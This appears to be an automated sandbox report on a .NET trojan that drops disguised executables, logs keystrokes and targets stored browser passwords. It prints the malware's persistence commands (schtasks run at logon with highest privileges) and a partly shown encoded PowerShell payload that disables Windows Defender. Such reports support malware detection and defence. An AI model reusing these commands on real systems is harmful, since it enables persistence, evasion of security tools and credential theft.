'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='

Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Client.exe.0.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Client.exe.0.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Infected.exe.0.dr, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Infected.exe.0.dr, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: Infected.exe.0.dr, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: Client.exe.0.dr, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke

Source: whoami.exe, 00000028.00000002.2230637919.000001E068988000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBP

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@118/59@6/6

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Loaader.exe	Mutant created: \Sessions\1\BaseNamedObjects\i??Fe?4?z2U?wXC6Af?fUT?6
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7384
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Loader.exe	Mutant created: \Sessions\1\BaseNamedObjects\OfflineKeylogger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\Loader.exe	Mutant created: \Sessions\1\BaseNamedObjects\scgofjarww
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File created: C:\Users\user\AppData\Local\Temp\Client.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Infected.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe, 00000014.00000002.2527964251.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, tmp5DD6.tmp.dat.21.dr, tmpABDC.tmp.dat.20.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	ReversingLabs: Detection: 73%
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Virustotal: Detection: 82%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Loaader.exe C:\Users\user\AppData\Roaming\Loaader.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Loader.exe C:\Users\user\AppData\Roaming\Loader.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
